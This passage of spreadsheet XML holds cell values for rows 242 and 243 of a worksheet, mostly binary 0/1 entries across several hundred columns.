      <c r="LK242">
        <v>0</v>
      </c>
      <c r="LL242">
        <v>0</v>
      </c>
      <c r="LM242">
        <v>0</v>
      </c>
      <c r="LN242">
        <v>0</v>
      </c>
      <c r="LO242">
        <v>1</v>
      </c>
      <c r="LP242">
        <v>0</v>
      </c>
      <c r="LQ242">
        <v>0</v>
      </c>
      <c r="LR242">
        <v>0</v>
      </c>
      <c r="LS242">
        <v>0</v>
      </c>
      <c r="LT242">
        <v>0</v>
      </c>
      <c r="LU242">
        <v>0</v>
      </c>
      <c r="LV242">
        <v>0</v>
      </c>
      <c r="LW242">
        <v>0</v>
      </c>
      <c r="LX242">
        <v>0</v>
      </c>
      <c r="LY242">
        <v>0</v>
      </c>
      <c r="LZ242">
        <v>1</v>
      </c>
      <c r="MA242">
        <v>0</v>
      </c>
      <c r="MB242">
        <v>0</v>
      </c>
      <c r="MC242">
        <v>0</v>
      </c>
      <c r="MD242">
        <v>1</v>
      </c>
      <c r="ME242">
        <v>0</v>
      </c>
      <c r="MF242">
        <v>0</v>
      </c>
      <c r="MG242">
        <v>0</v>
      </c>
      <c r="MH242">
        <v>0</v>
      </c>
      <c r="MI242">
        <v>0</v>
      </c>
      <c r="MJ242">
        <v>0</v>
      </c>
      <c r="MK242">
        <v>0</v>
      </c>
      <c r="ML242">
        <v>1</v>
      </c>
      <c r="MM242">
        <v>0</v>
      </c>
      <c r="MN242">
        <v>0</v>
      </c>
      <c r="MO242">
        <v>0</v>
      </c>
      <c r="MP242">
        <v>0</v>
      </c>
      <c r="MQ242">
        <v>0</v>
      </c>
      <c r="MR242">
        <v>0</v>
      </c>
      <c r="MS242">
        <v>0</v>
      </c>
      <c r="MT242">
        <v>0</v>
      </c>
      <c r="MU242">
        <v>0</v>
      </c>
      <c r="MV242">
        <v>0</v>
      </c>
      <c r="MW242">
        <v>0</v>
      </c>
      <c r="MX242">
        <v>0</v>
      </c>
      <c r="MY242">
        <v>0</v>
      </c>
      <c r="MZ242">
        <v>0</v>
      </c>
      <c r="NA242">
        <v>0</v>
      </c>
      <c r="NB242">
        <v>0</v>
      </c>
      <c r="NC242">
        <v>1</v>
      </c>
      <c r="ND242">
        <v>0</v>
      </c>
      <c r="NE242">
        <v>1</v>
      </c>
      <c r="NF242">
        <v>0</v>
      </c>
      <c r="NG242">
        <v>0</v>
      </c>
      <c r="NH242">
        <v>0</v>
      </c>
      <c r="NI242">
        <v>0</v>
      </c>
      <c r="NJ242">
        <v>0</v>
      </c>
      <c r="NK242">
        <v>0</v>
      </c>
      <c r="NL242">
        <v>0</v>
      </c>
      <c r="NM242">
        <v>0</v>
      </c>
      <c r="NN242">
        <v>0</v>
      </c>
      <c r="NO242">
        <v>0</v>
      </c>
      <c r="NP242">
        <v>0</v>
      </c>
      <c r="NQ242">
        <v>0</v>
      </c>
      <c r="NR242">
        <v>0</v>
      </c>
      <c r="NS242">
        <v>0</v>
      </c>
      <c r="NT242">
        <v>0</v>
      </c>
      <c r="NU242">
        <v>0</v>
      </c>
      <c r="NV242">
        <v>0</v>
      </c>
      <c r="NW242">
        <v>0</v>
      </c>
      <c r="NX242">
        <v>0</v>
      </c>
      <c r="NY242">
        <v>1</v>
      </c>
      <c r="NZ242">
        <v>1</v>
      </c>
      <c r="OA242">
        <v>0</v>
      </c>
      <c r="OB242">
        <v>0</v>
      </c>
      <c r="OC242">
        <v>0</v>
      </c>
      <c r="OD242">
        <v>0</v>
      </c>
      <c r="OE242">
        <v>0</v>
      </c>
      <c r="OF242">
        <v>0</v>
      </c>
      <c r="OG242">
        <v>1</v>
      </c>
      <c r="OH242">
        <v>0</v>
      </c>
      <c r="OI242">
        <v>0</v>
      </c>
      <c r="OJ242">
        <v>0</v>
      </c>
      <c r="OK242">
        <v>0</v>
      </c>
      <c r="OL242">
        <v>0</v>
      </c>
      <c r="OM242">
        <v>1</v>
      </c>
      <c r="ON242">
        <v>0</v>
      </c>
      <c r="OO242">
        <v>0</v>
      </c>
      <c r="OP242">
        <v>0</v>
      </c>
      <c r="OQ242">
        <v>0</v>
      </c>
      <c r="OR242">
        <v>0</v>
      </c>
      <c r="OS242">
        <v>0</v>
      </c>
      <c r="OT242">
        <v>0</v>
      </c>
      <c r="OU242">
        <v>0</v>
      </c>
      <c r="OV242">
        <v>0</v>
      </c>
      <c r="OW242">
        <v>0</v>
      </c>
      <c r="OX242">
        <v>0</v>
      </c>
      <c r="OY242">
        <v>0</v>
      </c>
      <c r="OZ242">
        <v>0</v>
      </c>
      <c r="PA242">
        <v>0</v>
      </c>
      <c r="PB242">
        <v>0</v>
      </c>
      <c r="PC242">
        <v>0</v>
      </c>
      <c r="PD242">
        <v>0</v>
      </c>
      <c r="PE242">
        <v>0</v>
      </c>
      <c r="PF242">
        <v>0</v>
      </c>
      <c r="PG242">
        <v>1</v>
      </c>
      <c r="PH242">
        <v>0</v>
      </c>
      <c r="PI242">
        <v>0</v>
      </c>
      <c r="PJ242">
        <v>0</v>
      </c>
      <c r="PK242">
        <v>0</v>
      </c>
      <c r="PL242">
        <v>0</v>
      </c>
      <c r="PM242">
        <v>0</v>
      </c>
      <c r="PN242">
        <v>1</v>
      </c>
      <c r="PO242">
        <v>0</v>
      </c>
      <c r="PP242">
        <v>0</v>
      </c>
      <c r="PQ242">
        <v>0</v>
      </c>
      <c r="PR242">
        <v>0</v>
      </c>
      <c r="PS242">
        <v>0</v>
      </c>
      <c r="PT242">
        <v>0</v>
      </c>
      <c r="PU242">
        <v>0</v>
      </c>
      <c r="PV242">
        <v>0</v>
      </c>
      <c r="PW242">
        <v>1</v>
      </c>
      <c r="PX242">
        <v>0</v>
      </c>
      <c r="PY242">
        <v>0</v>
      </c>
      <c r="PZ242">
        <v>0</v>
      </c>
      <c r="QA242">
        <v>0</v>
      </c>
      <c r="QB242">
        <v>1</v>
      </c>
      <c r="QC242">
        <v>0</v>
      </c>
      <c r="QD242">
        <v>0</v>
      </c>
      <c r="QE242">
        <v>0</v>
      </c>
      <c r="QF242">
        <v>0</v>
      </c>
      <c r="QG242">
        <v>0</v>
      </c>
      <c r="QH242">
        <v>0</v>
      </c>
      <c r="QI242">
        <v>0</v>
      </c>
      <c r="QJ242">
        <v>0</v>
      </c>
      <c r="QK242">
        <v>0</v>
      </c>
      <c r="QL242">
        <v>0</v>
      </c>
      <c r="QM242">
        <v>0</v>
      </c>
      <c r="QN242">
        <v>0</v>
      </c>
      <c r="QO242">
        <v>0</v>
      </c>
      <c r="QP242">
        <v>0</v>
      </c>
      <c r="QQ242">
        <v>0</v>
      </c>
      <c r="QR242">
        <v>0</v>
      </c>
      <c r="QS242">
        <v>1</v>
      </c>
      <c r="QT242">
        <v>0</v>
      </c>
      <c r="QU242">
        <v>0</v>
      </c>
      <c r="QV242">
        <v>0</v>
      </c>
      <c r="QW242">
        <v>0</v>
      </c>
      <c r="QX242">
        <v>0</v>
      </c>
      <c r="QY242">
        <v>0</v>
      </c>
      <c r="QZ242">
        <v>0</v>
      </c>
      <c r="RA242">
        <v>0</v>
      </c>
      <c r="RB242">
        <v>0</v>
      </c>
      <c r="RC242">
        <v>0</v>
      </c>
      <c r="RD242">
        <v>0</v>
      </c>
      <c r="RE242">
        <v>0</v>
      </c>
      <c r="RF242">
        <v>0</v>
      </c>
      <c r="RG242">
        <v>0</v>
      </c>
      <c r="RH242">
        <v>0</v>
      </c>
      <c r="RI242">
        <v>0</v>
      </c>
      <c r="RJ242">
        <v>0</v>
      </c>
      <c r="RK242">
        <v>0</v>
      </c>
      <c r="RL242">
        <v>0</v>
      </c>
      <c r="RM242">
        <v>1</v>
      </c>
      <c r="RN242">
        <v>0</v>
      </c>
      <c r="RO242">
        <v>1</v>
      </c>
      <c r="RP242">
        <v>0</v>
      </c>
      <c r="RQ242">
        <v>1</v>
      </c>
      <c r="RR242">
        <v>0</v>
      </c>
      <c r="RS242">
        <v>0</v>
      </c>
      <c r="RT242">
        <v>0</v>
      </c>
      <c r="RU242">
        <v>0</v>
      </c>
      <c r="RV242">
        <v>0</v>
      </c>
      <c r="RW242">
        <v>0</v>
      </c>
      <c r="RX242">
        <v>0</v>
      </c>
      <c r="RY242">
        <v>0</v>
      </c>
      <c r="RZ242">
        <v>0</v>
      </c>
      <c r="SA242">
        <v>0</v>
      </c>
    </row>
    <row r="243" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A243" s="6" t="s">
        <v>5387</v>
      </c>
      <c r="B243">
        <v>107</v>
      </c>
      <c r="C243">
        <v>0</v>
      </c>
      <c r="D243">
        <v>0</v>
      </c>
      <c r="E243">
        <v>0</v>
      </c>
      <c r="F243">
        <v>0</v>
      </c>
      <c r="G243">
        <v>0</v>
      </c>
      <c r="H243">
        <v>0</v>
      </c>
      <c r="I243">
        <v>1</v>
      </c>
      <c r="J243">
        <v>1</v>
      </c>
      <c r="K243">
        <v>0</v>
      </c>
      <c r="L243">
        <v>0</v>
      </c>
      <c r="M243">
        <v>1</v>
      </c>
      <c r="N243">
        <v>0</v>
      </c>
      <c r="O243">
        <v>0</v>
      </c>
      <c r="P243">
        <v>0</v>
      </c>
      <c r="Q243">
        <v>0</v>
      </c>
      <c r="R243">
        <v>0</v>
      </c>
      <c r="S243">
        <v>0</v>
      </c>
      <c r="T243">
        <v>1</v>
      </c>
      <c r="U243">
        <v>0</v>
      </c>
      <c r="V243">
        <v>0</v>
      </c>
      <c r="W243">
        <v>0</v>
      </c>
      <c r="X243">
        <v>0</v>
      </c>
      <c r="Y243">
        <v>0</v>
      </c>
      <c r="Z243">
        <v>1</v>
      </c>
      <c r="AA243">
        <v>0</v>
      </c>
      <c r="AB243">
        <v>0</v>
      </c>
      <c r="AC243">
        <v>0</v>
      </c>
      <c r="AD243">
        <v>0</v>
      </c>
      <c r="AE243">
        <v>0</v>
      </c>
      <c r="AF243">
        <v>0</v>
      </c>
      <c r="AG243">
        <v>0</v>
      </c>
      <c r="AH243">
        <v>0</v>
      </c>
      <c r="AI243">
        <v>1</v>
      </c>
      <c r="AJ243">
        <v>0</v>
      </c>
      <c r="AK243">
        <v>1</v>
      </c>
      <c r="AL243">
        <v>0</v>
      </c>
      <c r="AM243">
        <v>0</v>
      </c>
      <c r="AN243">
        <v>0</v>
      </c>
      <c r="AO243">
        <v>1</v>
      </c>
      <c r="AP243">
        <v>0</v>
      </c>
      <c r="AQ243">
        <v>0</v>
      </c>
      <c r="AR243">
        <v>0</v>
      </c>
      <c r="AS243">
        <v>0</v>
      </c>
      <c r="AT243">
        <v>0</v>
      </c>
      <c r="AU243">
        <v>1</v>
      </c>
      <c r="AV243">
        <v>1</v>
      </c>
      <c r="AW243">
        <v>0</v>
      </c>
      <c r="AX243">
        <v>0</v>
      </c>
      <c r="AY243">
        <v>0</v>
      </c>
      <c r="AZ243">
        <v>0</v>
      </c>
      <c r="BA243">
        <v>0</v>
      </c>
      <c r="BB243">
        <v>0</v>
      </c>
      <c r="BC243">
        <v>0</v>
      </c>
      <c r="BD243">
        <v>0</v>
      </c>
      <c r="BE243">
        <v>0</v>
      </c>
      <c r="BF243">
        <v>0</v>
      </c>
      <c r="BG243">
        <v>0</v>
      </c>
      <c r="BH243">
        <v>0</v>
      </c>
      <c r="BI243">
        <v>0</v>
      </c>
      <c r="BJ243">
        <v>0</v>
      </c>
      <c r="BK243">
        <v>0</v>
      </c>
      <c r="BL243">
        <v>1</v>
      </c>
      <c r="BM243">
        <v>0</v>
      </c>
      <c r="BN243">
        <v>0</v>
      </c>
      <c r="BO243">
        <v>0</v>
      </c>
      <c r="BP243">
        <v>1</v>
      </c>
      <c r="BQ243">
        <v>0</v>
      </c>
      <c r="BR243">
        <v>1</v>
      </c>
      <c r="BS243">
        <v>0</v>
      </c>
      <c r="BT243">
        <v>0</v>
      </c>
      <c r="BU243">
        <v>0</v>
      </c>
      <c r="BV243">
        <v>0</v>
      </c>
      <c r="BW243">
        <v>0</v>
      </c>
      <c r="BX243">
        <v>0</v>
      </c>
      <c r="BY243">
        <v>0</v>
      </c>
      <c r="BZ243">
        <v>0</v>
      </c>
      <c r="CA243">
        <v>0</v>
      </c>
      <c r="CB243">
        <v>0</v>
      </c>
      <c r="CC243">
        <v>0</v>
      </c>
      <c r="CD243">
        <v>0</v>
      </c>
      <c r="CE243">
        <v>0</v>
      </c>
      <c r="CF243">
        <v>0</v>
      </c>
      <c r="CG243">
        <v>0</v>
      </c>
      <c r="CH243">
        <v>0</v>
      </c>
      <c r="CI243">
        <v>0</v>
      </c>
      <c r="CJ243">
        <v>0</v>
      </c>
      <c r="CK243">
        <v>0</v>
      </c>
      <c r="CL243">
        <v>1</v>
      </c>
      <c r="CM243">
        <v>0</v>
      </c>
      <c r="CN243">
        <v>0</v>
      </c>
      <c r="CO243">
        <v>0</v>
      </c>
      <c r="CP243">
        <v>1</v>
      </c>
      <c r="CQ243">
        <v>0</v>
      </c>
      <c r="CR243">
        <v>0</v>
      </c>
      <c r="CS243">
        <v>1</v>
      </c>
      <c r="CT243">
        <v>1</v>
      </c>
      <c r="CU243">
        <v>0</v>
      </c>
      <c r="CV243">
        <v>0</v>
      </c>
      <c r="CW243">
        <v>0</v>
      </c>
      <c r="CX243">
        <v>1</v>
      </c>
      <c r="CY243">
        <v>0</v>
      </c>
      <c r="CZ243">
        <v>0</v>
      </c>
      <c r="DA243">
        <v>0</v>
      </c>
      <c r="DB243">
        <v>0</v>
      </c>
      <c r="DC243">
        <v>0</v>
      </c>
      <c r="DD243">
        <v>0</v>
      </c>
      <c r="DE243">
        <v>0</v>
      </c>
      <c r="DF243">
        <v>1</v>
      </c>
      <c r="DG243">
        <v>0</v>
      </c>
      <c r="DH243">
        <v>0</v>
      </c>
      <c r="DI243">
        <v>1</v>
      </c>
      <c r="DJ243">
        <v>0</v>
      </c>
      <c r="DK243">
        <v>1</v>
      </c>
      <c r="DL243">
        <v>0</v>
      </c>
      <c r="DM243">
        <v>0</v>
      </c>
      <c r="DN243">
        <v>0</v>
      </c>
      <c r="DO243">
        <v>0</v>
      </c>
      <c r="DP243">
        <v>1</v>
      </c>
      <c r="DQ243">
        <v>0</v>
      </c>
      <c r="DR243">
        <v>0</v>
      </c>
      <c r="DS243">
        <v>1</v>
      </c>
      <c r="DT243">
        <v>0</v>
      </c>
      <c r="DU243">
        <v>0</v>
      </c>
      <c r="DV243">
        <v>1</v>
      </c>
      <c r="DW243">
        <v>0</v>
      </c>
      <c r="DX243">
        <v>1</v>
      </c>
      <c r="DY243">
        <v>0</v>
      </c>
      <c r="DZ243">
        <v>0</v>
      </c>
      <c r="EA243">
        <v>0</v>
      </c>
      <c r="EB243">
        <v>0</v>
      </c>
      <c r="EC243">
        <v>0</v>
      </c>
      <c r="ED243">
        <v>1</v>
      </c>
      <c r="EE243">
        <v>0</v>
      </c>
      <c r="EF243">
        <v>0</v>
      </c>
      <c r="EG243">
        <v>0</v>
      </c>
      <c r="EH243">
        <v>0</v>
      </c>
      <c r="EI243">
        <v>1</v>
      </c>
      <c r="EJ243">
        <v>0</v>
      </c>
      <c r="EK243">
        <v>0</v>
      </c>
      <c r="EL243">
        <v>0</v>
      </c>
      <c r="EM243">
        <v>0</v>
      </c>
      <c r="EN243">
        <v>0</v>
      </c>
      <c r="EO243">
        <v>0</v>
      </c>
      <c r="EP243">
        <v>0</v>
      </c>
      <c r="EQ243">
        <v>1</v>
      </c>
      <c r="ER243">
        <v>0</v>
      </c>
      <c r="ES243">
        <v>1</v>
      </c>
      <c r="ET243">
        <v>1</v>
      </c>
      <c r="EU243">
        <v>0</v>
      </c>
      <c r="EV243">
        <v>0</v>
      </c>
      <c r="EW243">
        <v>0</v>
      </c>
      <c r="EX243">
        <v>1</v>
      </c>
      <c r="EY243">
        <v>1</v>
      </c>
      <c r="EZ243">
        <v>1</v>
      </c>
      <c r="FA243">
        <v>0</v>
      </c>
      <c r="FB243">
        <v>0</v>
      </c>
      <c r="FC243">
        <v>0</v>
      </c>
      <c r="FD243">
        <v>0</v>
      </c>
      <c r="FE243">
        <v>0</v>
      </c>
      <c r="FF243">
        <v>1</v>
      </c>
      <c r="FG243">
        <v>0</v>
      </c>
      <c r="FH243">
        <v>1</v>
      </c>
      <c r="FI243">
        <v>0</v>
      </c>
      <c r="FJ243">
        <v>0</v>
      </c>
      <c r="FK243">
        <v>0</v>
      </c>
      <c r="FL243">
        <v>0</v>
      </c>
      <c r="FM243">
        <v>0</v>
      </c>
      <c r="FN243">
        <v>0</v>
      </c>
      <c r="FO243">
        <v>0</v>
      </c>
      <c r="FP243">
        <v>0</v>
      </c>
      <c r="FQ243">
        <v>0</v>
      </c>
      <c r="FR243">
        <v>0</v>
      </c>
      <c r="FS243">
        <v>0</v>
      </c>
      <c r="FT243">
        <v>0</v>
      </c>
      <c r="FU243">
        <v>0</v>
      </c>
      <c r="FV243">
        <v>0</v>
      </c>
      <c r="FW243">
        <v>1</v>
      </c>
      <c r="FX243">
        <v>0</v>
      </c>
      <c r="FY243">
        <v>0</v>
      </c>
      <c r="FZ243">
        <v>0</v>
      </c>
      <c r="GA243">
        <v>0</v>
      </c>
      <c r="GB243">
        <v>0</v>
      </c>
      <c r="GC243">
        <v>0</v>
      </c>
      <c r="GD243">
        <v>0</v>
      </c>
      <c r="GE243">
        <v>0</v>
      </c>
      <c r="GF243">
        <v>1</v>
      </c>
      <c r="GG243">
        <v>0</v>
      </c>
      <c r="GH243">
        <v>0</v>
      </c>
      <c r="GI243">
        <v>1</v>
      </c>
      <c r="GJ243">
        <v>0</v>
      </c>
      <c r="GK243">
        <v>0</v>
      </c>
      <c r="GL243">
        <v>1</v>
      </c>
      <c r="GM243">
        <v>0</v>
      </c>
      <c r="GN243">
        <v>0</v>
      </c>
      <c r="GO243">
        <v>0</v>
      </c>
      <c r="GP243">
        <v>0</v>
      </c>
      <c r="GQ243">
        <v>0</v>
      </c>
      <c r="GR243">
        <v>0</v>
      </c>
      <c r="GS243">
        <v>1</v>
      </c>
      <c r="GT243">
        <v>0</v>
      </c>
      <c r="GU243">
        <v>1</v>
      </c>
      <c r="GV243">
        <v>0</v>
      </c>
      <c r="GW243">
        <v>0</v>
      </c>
      <c r="GX243">
        <v>0</v>
      </c>
      <c r="GY243">
        <v>0</v>
      </c>
      <c r="GZ243">
        <v>0</v>
      </c>
      <c r="HA243">
        <v>0</v>
      </c>
      <c r="HB243">
        <v>1</v>
      </c>
      <c r="HC243">
        <v>1</v>
      </c>
      <c r="HD243">
        <v>1</v>
      </c>
      <c r="HE243">
        <v>0</v>
      </c>
      <c r="HF243">
        <v>0</v>
      </c>
      <c r="HG243">
        <v>0</v>
      </c>
      <c r="HH243">
        <v>0</v>
      </c>
      <c r="HI243">
        <v>1</v>
      </c>
      <c r="HJ243">
        <v>0</v>
      </c>
      <c r="HK243">
        <v>0</v>
      </c>
      <c r="HL243">
        <v>1</v>
      </c>
      <c r="HM243">
        <v>0</v>
      </c>
      <c r="HN243">
        <v>0</v>
      </c>
      <c r="HO243">
        <v>0</v>
      </c>
      <c r="HP243">
        <v>1</v>
      </c>
      <c r="HQ243">
        <v>0</v>
      </c>
      <c r="HR243">
        <v>0</v>
      </c>
      <c r="HS243">
        <v>0</v>
      </c>
      <c r="HT243">
        <v>0</v>
      </c>
      <c r="HU243">
        <v>0</v>
      </c>
      <c r="HV243">
        <v>0</v>
      </c>
      <c r="HW243">
        <v>0</v>
      </c>
      <c r="HX243">
        <v>0</v>
      </c>
      <c r="HY243">
        <v>0</v>
      </c>
      <c r="HZ243">
        <v>1</v>
      </c>
      <c r="IA243">
        <v>0</v>
      </c>
      <c r="IB243">
        <v>0</v>
      </c>
      <c r="IC243">
        <v>0</v>
      </c>
      <c r="ID243">
        <v>1</v>
      </c>
      <c r="IE243">
        <v>0</v>
      </c>
      <c r="IF243">
        <v>0</v>
      </c>
      <c r="IG243">
        <v>0</v>
      </c>
      <c r="IH243">
        <v>0</v>
      </c>
      <c r="II243">
        <v>1</v>
      </c>
      <c r="IJ243">
        <v>1</v>
      </c>
      <c r="IK243">
        <v>0</v>
      </c>
      <c r="IL243">
        <v>0</v>
      </c>
      <c r="IM243">
        <v>0</v>
      </c>
      <c r="IN243">
        <v>0</v>
      </c>
      <c r="IO243">
        <v>1</v>
      </c>
      <c r="IP243">
        <v>1</v>
      </c>
      <c r="IQ243">
        <v>1</v>
      </c>
      <c r="IR243">
        <v>1</v>
      </c>
      <c r="IS243">
        <v>1</v>
      </c>
      <c r="IT243">
        <v>0</v>
      </c>
      <c r="IU243">
        <v>0</v>
      </c>
      <c r="IV243">
        <v>1</v>
      </c>
      <c r="IW243">
        <v>0</v>
      </c>
      <c r="IX243">
        <v>1</v>
      </c>
      <c r="IY243">
        <v>0</v>
      </c>
      <c r="IZ243">
        <v>0</v>
      </c>
      <c r="JA243">
        <v>0</v>
      </c>
      <c r="JB243">
        <v>0</v>
      </c>
      <c r="JC243">
        <v>0</v>
      </c>
      <c r="JD243">
        <v>0</v>
      </c>
      <c r="JE243">
        <v>0</v>
      </c>
      <c r="JF243">
        <v>0</v>
      </c>
      <c r="JG243">
        <v>0</v>
      </c>
      <c r="JH243">
        <v>0</v>
      </c>
      <c r="JI243">
        <v>0</v>
      </c>
      <c r="JJ243">
        <v>0</v>
      </c>
      <c r="JK243">
        <v>0</v>
      </c>
      <c r="JL243">
        <v>0</v>
      </c>
      <c r="JM243">
        <v>0</v>
      </c>
      <c r="JN243">
        <v>0</v>
      </c>
      <c r="JO243">
        <v>1</v>
      </c>
      <c r="JP243">
        <v>1</v>
      </c>
      <c r="JQ243">
        <v>0</v>
      </c>
      <c r="JR243">
        <v>0</v>
      </c>
      <c r="JS243">
        <v>0</v>
      </c>
      <c r="JT243">
        <v>0</v>
      </c>
      <c r="JU243">
        <v>0</v>
      </c>
      <c r="JV243">
        <v>0</v>
      </c>
      <c r="JW243">
        <v>0</v>
      </c>
      <c r="JX243">
        <v>0</v>
      </c>
      <c r="JY243">
        <v>0</v>
      </c>
      <c r="JZ243">
        <v>0</v>
      </c>
      <c r="KA243">
        <v>0</v>
      </c>
      <c r="KB243">
        <v>0</v>
      </c>
      <c r="KC243">
        <v>0</v>
      </c>
      <c r="KD243">
        <v>0</v>
      </c>
      <c r="KE243">
        <v>1</v>
      </c>
      <c r="KF243">
        <v>0</v>
      </c>
      <c r="KG243">
        <v>1</v>
      </c>
      <c r="KH243">
        <v>0</v>
      </c>
      <c r="KI243">
        <v>0</v>
      </c>
      <c r="KJ243">
        <v>0</v>
      </c>
      <c r="KK243">
        <v>0</v>
      </c>
      <c r="KL243">
        <v>0</v>
      </c>
      <c r="KM243">
        <v>0</v>
      </c>
      <c r="KN243">
        <v>0</v>
      </c>
      <c r="KO243">
        <v>0</v>
      </c>
      <c r="KP243">
        <v>0</v>
      </c>
      <c r="KQ243">
        <v>0</v>
      </c>
      <c r="KR243">
        <v>0</v>
      </c>
      <c r="KS243">
        <v>0</v>
      </c>
      <c r="KT243">
        <v>1</v>
      </c>
      <c r="KU243">
        <v>0</v>
      </c>
      <c r="KV243">
        <v>0</v>
      </c>
      <c r="KW243">
        <v>0</v>
      </c>
      <c r="KX243">
        <v>0</v>
      </c>
      <c r="KY243">
        <v>0</v>
      </c>
      <c r="KZ243">
        <v>1</v>
      </c>
      <c r="LA243">
        <v>1</v>
      </c>
      <c r="LB243">
        <v>0</v>
      </c>
      <c r="LC243">
        <v>0</v>
      </c>
      <c r="LD243">
        <v>1</v>
      </c>
      <c r="LE243">
        <v>0</v>
      </c>
      <c r="LF243">
        <v>0</v>
      </c>
      <c r="LG243">
        <v>0</v>
      </c>
      <c r="LH243">
        <v>0</v>
      </c>
      <c r="LI243">
        <v>0</v>
      </c>
      <c r="LJ243">
        <v>1</v>
      </c>
      <c r="LK243">
        <v>0</v>
      </c>
      <c r="LL243">
        <v>1</v>
      </c>
      <c r="LM243">
        <v>0</v>
      </c>
      <c r="LN243">
        <v>0</v>
      </c>
      <c r="LO243">
        <v>1</v>
      </c>
      <c r="LP243">
        <v>0</v>
      </c>
      <c r="LQ243">
        <v>0</v>
      </c>
      <c r="LR243">
        <v>0</v>
      </c>
      <c r="LS243">
        <v>1</v>
      </c>
      <c r="LT243">
        <v>0</v>
      </c>
      <c r="LU243">
        <v>0</v>
      </c>
      <c r="LV243">
        <v>0</v>
      </c>
      <c r="LW243">
        <v>1</v>
      </c>
      <c r="LX243">
        <v>0</v>
      </c>
      <c r="LY243">
        <v>0</v>
      </c>
      <c r="LZ243">
        <v>0</v>
      </c>
      <c r="MA243">
        <v>0</v>
      </c>
      <c r="MB243">
        <v>0</v>
      </c>
      <c r="MC243">
        <v>1</v>
      </c>
      <c r="MD243">
        <v>1</v>
      </c>
      <c r="ME243">
        <v>0</v>
      </c>
      <c r="MF243">
        <v>0</v>
      </c>
      <c r="MG243">
        <v>0</v>
      </c>
      <c r="MH243">
        <v>0</v>
      </c>
      <c r="MI243">
        <v>0</v>
      </c>
      <c r="MJ243">
        <v>0</v>
      </c>
      <c r="MK243">
        <v>0</v>
      </c>
      <c r="ML243">
        <v>1</v>
      </c>
      <c r="MM243">
        <v>0</v>
      </c>
      <c r="MN243">
        <v>1</v>
      </c>
      <c r="MO243">
        <v>1</v>
      </c>
      <c r="MP243">
        <v>1</v>
      </c>
      <c r="MQ243">
        <v>0</v>
      </c>
      <c r="MR243">
        <v>1</v>
      </c>
      <c r="MS243">
        <v>0</v>
      </c>
      <c r="MT243">
        <v>0</v>
      </c>
      <c r="MU243">
        <v>0</v>
      </c>
      <c r="MV243">
        <v>0</v>
      </c>
      <c r="MW243">
        <v>0</v>
      </c>
      <c r="MX243">
        <v>1</v>
      </c>
      <c r="MY243">
        <v>0</v>
      </c>
      <c r="MZ243">
        <v>0</v>
      </c>
      <c r="NA243">
        <v>1</v>
      </c>
      <c r="NB243">
        <v>0</v>
      </c>
      <c r="NC243">
        <v>0</v>
      </c>
      <c r="ND243">
        <v>0</v>
      </c>
      <c r="NE243">
        <v>1</v>
      </c>
      <c r="NF243">
        <v>0</v>
      </c>
      <c r="NG243">
        <v>0</v>
      </c>
      <c r="NH243">
        <v>0</v>
      </c>
      <c r="NI243">
        <v>0</v>
      </c>
      <c r="NJ243">
        <v>0</v>
      </c>
      <c r="NK243">
        <v>1</v>
      </c>
      <c r="NL243">
        <v>0</v>
      </c>
      <c r="NM243">
        <v>0</v>
      </c>
      <c r="NN243">
        <v>0</v>
      </c>
      <c r="NO243">
        <v>0</v>
      </c>
      <c r="NP243">
        <v>0</v>
      </c>
      <c r="NQ243">
        <v>0</v>
      </c>
      <c r="NR243">
        <v>0</v>
      </c>
      <c r="NS243">
        <v>0</v>
      </c>
      <c r="NT243">
        <v>1</v>
      </c>
      <c r="NU243">
        <v>1</v>
      </c>
      <c r="NV243">
        <v>0</v>
      </c>
      <c r="NW243">
        <v>0</v>
      </c>
      <c r="NX243">
        <v>0</v>
      </c>
      <c r="NY243">
        <v>0</v>
      </c>
      <c r="NZ243">
        <v>0</v>
      </c>
      <c r="OA243">
        <v>0</v>
      </c>
      <c r="OB243">
        <v>0</v>
      </c>
      <c r="OC243">
        <v>0</v>
      </c>
      <c r="OD243">
        <v>0</v>
      </c>
      <c r="OE243">
        <v>0</v>
      </c>
      <c r="OF243">
        <v>1</v>
      </c>
      <c r="OG243">
        <v>1</v>
      </c>
      <c r="OH243">
        <v>1</v>
      </c>
      <c r="OI243">
        <v>0</v>
      </c>
      <c r="OJ243">
        <v>0</v>
      </c>
      <c r="OK243">
        <v>0</v>
      </c>
      <c r="OL243">
        <v>0</v>
      </c>
      <c r="OM243">
        <v>0</v>
      </c>
      <c r="ON243">
        <v>1</v>
      </c>
      <c r="OO243">
        <v>1</v>
      </c>
      <c r="OP243">
        <v>0</v>
      </c>
      <c r="OQ243">
        <v>1</v>
      </c>
      <c r="OR243">
        <v>0</v>
      </c>
      <c r="OS243">
        <v>0</v>
      </c>
      <c r="OT243">
        <v>0</v>
      </c>
      <c r="OU243">
        <v>0</v>
      </c>
      <c r="OV243">
        <v>0</v>
      </c>
      <c r="OW243">
        <v>0</v>
      </c>
      <c r="OX243">
        <v>0</v>
      </c>
      <c r="OY243">
        <v>0</v>
      </c>
      <c r="OZ243">
        <v>0</v>
      </c>
      <c r="PA243">
        <v>0</v>
      </c>
      <c r="PB243">
        <v>0</v>
      </c>
      <c r="PC243">
        <v>0</v>
      </c>
      <c r="PD243">
        <v>0</v>
      </c>
      <c r="PE243">
        <v>0</v>
      </c>
      <c r="PF243">
        <v>1</v>
      </c>
      <c r="PG243">
        <v>1</v>
      </c>
      <c r="PH243">
        <v>0</v>
      </c>
      <c r="PI243">
        <v>0</v>
      </c>
      <c r="PJ243">
        <v>0</v>
      </c>
      <c r="PK243">
        <v>0</v>
      </c>
      <c r="PL243">
        <v>1</v>
      </c>
      <c r="PM243">
        <v>0</v>
      </c>
      <c r="PN243">
        <v>0</v>
      </c>
      <c r="PO243">
        <v>0</v>
      </c>
      <c r="PP243">
        <v>1</v>
      </c>
      <c r="PQ243">
        <v>0</v>
      </c>
      <c r="PR243">
        <v>0</v>
      </c>
      <c r="PS243">
        <v>0</v>
      </c>
      <c r="PT243">
        <v>1</v>
      </c>
      <c r="PU243">
        <v>1</v>
      </c>
      <c r="PV243">
        <v>0</v>
      </c>
      <c r="PW243">
        <v>0</v>
      </c>
      <c r="PX243">
        <v>0</v>
      </c>
      <c r="PY243">
        <v>1</v>
      </c>
      <c r="PZ243">
        <v>1</v>
      </c>
      <c r="QA243">
        <v>0</v>
      </c>
      <c r="QB243">
        <v>0</v>
      </c>
      <c r="QC243">
        <v>1</v>
      </c>
      <c r="QD243">
        <v>1</v>
      </c>
      <c r="QE243">
        <v>0</v>
      </c>
      <c r="QF243">
        <v>1</v>
      </c>
